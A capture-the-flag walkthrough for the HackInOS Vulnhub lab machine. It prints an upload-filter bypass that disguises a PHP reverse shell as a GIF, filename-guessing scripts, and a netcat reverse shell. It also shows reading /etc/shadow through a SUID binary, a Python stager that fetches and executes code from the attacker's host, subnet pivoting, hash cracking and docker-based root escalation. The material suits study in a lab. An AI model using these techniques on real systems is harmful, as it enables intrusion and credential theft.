
HackInOS is described as a beginner-level CTF-style vulnerable machine. This one is particularly challenging because there are multiple subnets involved: the vulnerable machine also hosts a local subnet, 172.18.0.0/24, that I find later. Knowing this, I have to leverage Metasploit's pivoting tools such as autoroute to move the attack from the HackInOS box into the neighboring subnet. This is the HackInOS level 1 vulnhub tutorial.

Want to set up a home pentesting lab to practice your ethical hacking skills? I spell out how it's done in the 10 easy steps post.

The first step is to list the running services on the HackInOS vulnerable box. For this I use a variety of tools, such as nmap and netdiscover. Whenever I start the host enumeration and information gathering phase in Kali Linux I first prepare a new Metasploit workspace so that scan results land in the database. See the commands I use below.

# FOLLOW THESE DIRECTIONS!

# start the database server that Metasploit stores hosts and services in
root@kali:~# service postgresql start

root@kali:~# msfdb init

root@kali:~# msfconsole

# create the workspace (-a for "add") and switch to it
msf > workspace -a hios
msf > workspace hios

Looking at the results of my scan I can tell that the host is Ubuntu and that OpenSSH is installed, which means that ssh is most likely enabled. Additionally, Apache is running and its version is 2.4.25. These are all details that will be used later to root the machine.

Use nmap or db_nmap and list the versions of the running services (-sV).

Knowing that port 8000 is open I navigate to <ip address>:8000 and see that the blog is up and running. This is a good time to use dirb to brute force the directories of the web server.

root@kali:~# dirb http://10.0.2.15:8000
http://10.0.2.15:8000/robots.txt
http://10.0.2.15:8000/upload.php

	if($check["mime"] == "image/png" || $check["mime"] == "image/gif"){
		$uploadOk = 1;
	}else{
		$uploadOk = 0;
		echo ":)";
	} 
  if($uploadOk == 1){
      move_uploaded_file($_FILES["file"]["tmp_name"], $target_file.".".$imageFileType);
      echo "File uploaded /uploads/?";
  }

The web server accepted the new script as an upload. Only where did it go?

At the bottom of the page's source code a hint is found. It contains a link to a GitHub page with the code for the upload.php server-side script. Looking closely at the code I see there is an input check on the MIME type of the uploaded file, and that type is derived from the file's leading bytes (the image signature), not from its extension. The trick is to bypass this check by fooling the script into believing what I am uploading is one of the allowed types. I accomplish this by prepending a GIF header to the PHP reverse shell that ships with Kali (php-reverse-shell.php). The standard GIF magic is GIF89a; the shorter string "GIF98" that I used begins with the same GIF signature and passed the check as well. I then upload the file to upload.php, and a message confirms that the shell script was accepted: "File uploaded /uploads/?".

I've inserted the GIF file format header into the reverse web shell script to pass inspection.

Here is the next issue: the author of the lab has designed each step to be more difficult than the last. I need to know the filename to be able to execute the shell from the terminal (in this case I use dirb to request each candidate, which makes the server execute the PHP). The filename is randomized by design: the new filename is the MD5 hash of the original filename concatenated with a random number between 1 and 100, with the original extension appended.

  • myshell.php1-100 (original name with the random number appended)
  • md5sum(myshell.php1-100)
  • s37zdxbe7z8723.php (illustrative; the real name is the 32-character hex digest plus the .php extension)

Now that I have all possible filenames in a wordlist, which I have named wl.txt, it's time to revisit dirb. Requesting a matching file in the uploads directory makes the web server execute my PHP script. Using bash and Python I create a script to hammer out the 100 possible filenames, since that is all we need to cover.

# upload.php names the file md5(original_name . rand(1,100)) . ".php"
for i in $(seq 1 100)
do
  f="shell.php$i"
  # printf, not echo: PHP's md5() input has no trailing newline
  md5=$(printf '%s' "$f" | md5sum | cut -d' ' -f1)
  echo "$md5.php"
done > wl.txt

Here is the same script ported into Python.

import hashlib

# open with "w" rather than "a+" so re-running the script does not
# duplicate entries in the wordlist
with open("wl.txt", "w") as f:
    # rand(1,100) in PHP is inclusive on both ends
    for n in range(1, 101):
        newFileName = "shell.php" + str(n)
        # hashlib needs bytes on Python 3
        hashObj = hashlib.md5(newFileName.encode())
        # re-add the php extension to our payload script's name
        fullFileName = hashObj.hexdigest() + ".php"
        f.write(fullFileName + "\n")

After uploading the reverse PHP web shell I start a netcat listener on my Kali Linux machine. With the listener running, pointing dirb at the wordlist triggers the connection and I now have a reverse shell on the server.

root@kali:~# dirb http://10.0.2.15:8000/uploads/ wl.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

URL_BASE: http://10.0.2.15:8000/uploads/
WORDLIST_FILES: wl.txt

-----------------

GENERATED WORDS: 300                                                           

---- Scanning URL: http://10.0.2.15:8000/uploads/ ----
+ http://10.0.2.15:8000/uploads/a483ae0419317c67cc89e14673d7da70.php (CODE:200|SIZE:285)           
                                                                                                   
-----------------
DOWNLOADED: 300 - FOUND: 1
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.0.2.5] from (UNKNOWN) [10.0.2.15] 54822

Next comes the concept of files with the SUID (set user ID) permission bit. A SUID binary runs with the privileges of its owner rather than of the user who executes it. What makes this dangerous is a root-owned SUID binary that can read arbitrary files: a determined attacker who finds one can read anything on the system, including root-only files such as /etc/shadow.

$ find / -perm -4000 2>/dev/null      # or: find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/tail
/usr/bin/chfn
$ tail -c1G /etc/shadow
news:*:17931:0:99999:7:::
uucp:*:17931:0:99999:7:::
proxy:*:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
backup:*:17931:0:99999:7:::
list:*:17931:0:99999:7:::
irc:*:17931:0:99999:7:::
gnats:*:17931:0:99999:7:::
nobody:*:17931:0:99999:7:::
_apt:*:17931:0:99999:7:::
$ su john
su: must be run from a terminal
$ su root
su: must be run from a terminal
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@1afdd1f6b82c:/$ 
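The two checks an operator does by eye above, spotting the SUID binary that does not belong and picking out the shadow entries that are actually crackable, as an added Python example (not from the page). The find output is the list shown on this page; the shadow excerpt and the baseline of expected SUID binaries are constructed and should be replaced with the real ones for the system being audited:

```python
# Constructed sample of `find / -perm -4000` output, matching the binaries
# listed on this page.
FIND_OUTPUT = """\
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/tail
/usr/bin/chfn
"""

# Assumed baseline: SUID-root binaries found on a stock Debian/Ubuntu image.
# Extend it for the distribution you are auditing.
EXPECTED_SUID = {
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/mount",
    "/usr/bin/umount", "/bin/su", "/bin/mount", "/bin/umount",
}

# Constructed /etc/shadow excerpt in the same layout as the tail output above.
# Hash values are placeholders, not real digests.
SHADOW_SAMPLE = """\
root:$6$saltsalt$constructedhashvalue:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
nobody:*:17931:0:99999:7:::
deploy:!:17931:0:99999:7:::
dev:$1$abc$constructedmd5crypt:17931:0:99999:7:::
"""


def unexpected_suid(find_output, baseline=EXPECTED_SUID):
    """SUID binaries not in the baseline: the ones worth a second look (here, tail)."""
    paths = [line.strip() for line in find_output.splitlines() if line.strip()]
    return [p for p in paths if p not in baseline]


def crackable_accounts(shadow_text):
    """Accounts whose second field is a real hash rather than a locked marker."""
    result = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, hashed = fields[0], fields[1]
        # "", "*" and anything starting with "!" mean no usable password
        if hashed in ("", "*") or hashed.startswith("!"):
            continue
        result[user] = hashed
    return result


def hash_algorithm(hashed):
    """Map the crypt(3) prefix to an algorithm name, to pick a john/hashcat mode."""
    prefixes = {
        "$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
        "$y$": "yescrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    }
    for prefix, name in prefixes.items():
        if hashed.startswith(prefix):
            return name
    return "unknown"


if __name__ == "__main__":
    print("unexpected SUID:", unexpected_suid(FIND_OUTPUT))
    for user, hashed in crackable_accounts(SHADOW_SAMPLE).items():
        print(f"{user}: {hash_algorithm(hashed)}")
```

On the target the inputs come from `find / -perm -4000 2>/dev/null` and, as on this page, from reading /etc/shadow through the SUID tail binary. Defensively the same script doubles as a quick integrity check: any path reported by unexpected_suid() on a production host is either a deliberate exception you can name or a misconfiguration.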

As this is a WordPress site, I look for a common configuration file. The hint about details suggests the next step lies in a settings file. To expedite finding it I use find / -name '*wp-config*' 2>/dev/null. The credentials for a MySQL database are found in wp-config.php.

root@1afdd1f6b82c:~# ls
ls
flag
root@1afdd1f6b82c:~# ls -a
ls -a
.  ..  .bash_history  .bashrc  .nano  .port  .profile  .wget-hsts  flag
root@1afdd1f6b82c:~# cat .port
cat .port
Listen to your friends..
7*
root@1afdd1f6b82c:~# python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://10.0.2.5:8080/BvHdDL4e72');exec(r.read());"

The Python one-liner above is a Metasploit web_delivery stager: it fetches and executes a payload from my Kali box and gives me a Meterpreter session on the rooted container, which is what pivoting requires. From that session I use the autoroute post module, run autoroute -s 172.18.0.0/24 (or post/multi/manage/autoroute), so that Metasploit routes traffic for 172.18.0.0/24 through the session and its scanner modules can reach the neighboring subnet.

msf5 > use auxiliary/scanner/portscan/tcp
msf5 > set RHOSTS 172.18.0.0-50
msf5 > set THREADS 50
msf5 > run
Port 3306 is open on 172.18.0.3, one of the discovered hosts.
# -p followed by a space prompts for the password from wp-config.php; the trailing "wordpress" is the database name
root@1afdd1f6b82c:~# mysql -u wordpress -p wordpress -h 172.18.0.3
root@kali:~# john --format=Raw-MD5 hashes.txt
I copy the password hashes found in the database into hashes.txt on Kali and run John the Ripper against them. Cracking the MD5 hash returns a password of '123456'.
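What john --format=Raw-MD5 is doing for the hash above, as an added Python example rather than anything from the page: a dictionary attack against unsalted MD5, with a format check so that a WordPress core password (phpass, $P$ prefix, which needs --format=phpass) is not silently mis-cracked. The hashes.txt contents and the wordlist are constructed; the MD5 of 123456 is the only real value in it:

```python
import hashlib
import re

# Constructed hashes.txt in user:hash form. The second line has the shape of a
# WordPress core (phpass) hash and is there to show why it must be skipped.
HASHES_TXT = """\
wpadmin:e10adc3949ba59abbe56e057f20f883e
editor:$P$BconstructedPhpassHashShapeOnly0000
"""

# Constructed mini wordlist; a real run uses rockyou.txt or similar.
WORDLIST = ["password", "letmein", "123456", "wordpress"]

MD5_HEX = re.compile(r"[0-9a-f]{32}")


def detect_format(hashed):
    """Classify a hash string the way you would pick a john --format value."""
    if MD5_HEX.fullmatch(hashed.lower()):
        return "Raw-MD5"
    if hashed.startswith(("$P$", "$H$")):
        return "phpass"
    return "unknown"


def parse_hashes(text):
    """Read user:hash lines; ignores lines without a separator."""
    entries = []
    for line in text.splitlines():
        if ":" in line:
            user, hashed = line.split(":", 1)
            entries.append((user.strip(), hashed.strip()))
    return entries


def crack_raw_md5(entries, wordlist):
    """Return (cracked {user: password}, skipped [(user, format)])."""
    # Hash each candidate once and look every target up in the table,
    # instead of re-hashing the wordlist per target.
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    cracked = {}
    skipped = []
    for user, hashed in entries:
        fmt = detect_format(hashed)
        if fmt != "Raw-MD5":
            skipped.append((user, fmt))
            continue
        word = lookup.get(hashed.lower())
        if word is not None:
            cracked[user] = word
    return cracked, skipped


if __name__ == "__main__":
    cracked, skipped = crack_raw_md5(parse_hashes(HASHES_TXT), WORDLIST)
    print("cracked:", cracked)
    print("skipped (wrong format for Raw-MD5):", skipped)
```

The lookup-table approach is why unsalted MD5 falls so quickly: one hashing pass over the wordlist serves every target hash at once. A salted scheme such as phpass or sha512crypt forces the attacker back to hashing per account and per candidate, which is the property a password store should have.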
msf5 auxiliary(scanner/portscan/tcp) > ssh [email protected]
On the host I can run docker without sudo, which is effectively root: I start a container with the host's root filesystem bind-mounted at /root and read the flag from there.

hummingbirdscyber@vulnvm:~$ docker run -v /:/root -i -t ubuntu /bin/bash
root@f52988320703:/# cd /root
root@f52988320703:~# ls
bin   cdrom  etc   initrd.img	   lib	  lost+found  mnt  proc  run   snap  sys  usr  vmlinuz
boot  dev    home  initrd.img.old  lib64  media       opt  root  sbin  srv   tmp  var
root@f52988320703:~# cd root
root@f52988320703:~/root# ls
flag
root@f52988320703:~/root# cat flag
Congratulations!  